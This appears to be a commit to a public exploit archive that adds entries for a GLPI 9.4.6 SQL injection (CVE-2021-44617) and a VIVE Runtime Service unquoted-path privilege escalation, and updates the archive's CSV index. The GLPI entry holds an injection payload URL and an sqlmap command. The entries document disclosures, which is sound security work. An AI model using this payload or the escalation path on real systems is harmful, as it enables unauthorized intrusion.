DB: 2022-03-15

4 changes to exploits/shellcodes VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path Siemens S7-1200 - Unauthenticated Start/Stop Command Baixar GLPI Project 9.4.6 - SQLi
igorblum · Mar 15, 2022 · 2ad6c86 · 2ad6c86
1 parent 653f886
commit 2ad6c86
Show file tree

Hide file tree

Showing 4 changed files with 43 additions and 17 deletions.
diff --git a/exploits/hardware/remote/50820.txt b/exploits/hardware/remote/50820.txt
diff --git a/exploits/multiple/webapps/50823.txt b/exploits/multiple/webapps/50823.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi
+# Date: 10/12
+# Exploit Author: Joas Antonio
+# Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/
+# Software Link: https://glpi-project.org/pt-br/baixar/
+# Version: GLPI - 9.4.6
+# Tested on: Windows/Linux
+# CVE : CVE-2021-44617
+
+#POC1:
+plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111
+
+sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"
diff --git a/exploits/windows/local/50824.txt b/exploits/windows/local/50824.txt
@@ -0,0 +1,28 @@
+# Exploit Title: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path
+# Date: 11/03/2022
+# Exploit Author: Faisal Alasmari
+# Vendor Homepage: https://www.vive.com/
+# Software Link: https://developer.vive.com/resources/downloads/
+# Version: 1.0.0.4
+# Tested: Windows 10 x64
+
+
+
+C:\Users\User>sc qc "VIVE Runtime Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VIVE Runtime Service
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : VIVE Runtime Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -11471,6 +11471,7 @@ id,file,description,date,author,type,platform,port
 50815,exploits/windows/local/50815.txt,"BattlEye 0.9 - 'BEService' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
 50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
+50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18646,7 +18647,6 @@ id,file,description,date,author,type,platform,port
 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware,
 50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
 50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
-50820,exploits/hardware/remote/50820.txt,"Siemens S7-1200 - Unauthenticated Start/Stop Command",1970-01-01,RoseSecurity,remote,hardware,
 50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
 50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
@@ -44892,3 +44892,4 @@ id,file,description,date,author,type,platform,port
 50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple,
 50809,exploits/linux/webapps/50809.py,"Webmin 1.984 - Remote Code Execution (Authenticated)",1970-01-01,faisalfs10x,webapps,linux,
 50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Hussien Misbah",webapps,php,
+50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple,